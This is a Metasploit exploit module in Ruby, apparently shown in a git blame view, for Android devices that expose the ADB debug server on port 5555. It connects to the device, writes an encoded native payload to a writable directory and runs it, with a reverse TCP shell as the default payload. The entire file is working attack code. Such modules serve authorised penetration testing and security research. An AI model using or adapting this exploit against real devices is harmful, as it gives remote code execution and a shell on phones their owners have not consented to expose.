metasploit-framework/modules/exploits/android/adb/adb_server_exec.rb

86 lines
2.3 KiB
Ruby
Raw Normal View History

2016-01-02 20:13:54 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-01-03 05:06:23 +00:00
require 'rex/proto/adb'
2016-01-02 20:13:54 +00:00
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2016-01-02 20:13:54 +00:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Android ADB Debug Server Remote Payload Execution',
2016-01-02 20:13:54 +00:00
'Description' => %q{
2016-01-03 04:41:38 +00:00
Writes and spawns a native payload on an android device that is listening
2016-01-02 20:13:54 +00:00
for adb debug messages.
},
'Author' => ['joev'],
'License' => MSF_LICENSE,
2016-01-03 04:41:38 +00:00
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
2016-01-02 20:13:54 +00:00
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
'Targets' => [
['armle', {'Arch' => ARCH_ARMLE}],
['x86', {'Arch' => ARCH_X86}],
['x64', {'Arch' => ARCH_X86_64}],
['mipsle', {'Arch' => ARCH_MIPSLE}]
],
2016-01-02 20:13:54 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 2016'
))
register_options([
Opt::RPORT(5555),
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
], self.class)
end
def check
2016-01-03 04:41:38 +00:00
setup_adb_connection do
device_info = @adb_client.connect.data
2016-01-02 20:13:54 +00:00
print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
2016-01-03 04:41:38 +00:00
response = @adb_client.exec_cmd(cmd)
2016-01-02 20:13:54 +00:00
print_good "Command executed, response:\n #{response}"
end
def exploit
2016-01-03 04:41:38 +00:00
setup_adb_connection do
device_data = @adb_client.connect
2016-01-02 20:13:54 +00:00
print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({
flavor: :echo,
enc_format: :octal,
prefix: '\\\\0',
temp: datastore['WritableDir'],
linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
background: true,
nodelete: true
2016-01-02 20:13:54 +00:00
})
end
end
2016-01-03 04:41:38 +00:00
def setup_adb_connection(&blk)
begin
print_status "Connecting to device..."
connect
@adb_client = Rex::Proto::ADB::Client.new(sock)
blk.call
ensure
disconnect
end
2016-01-02 20:13:54 +00:00
end
end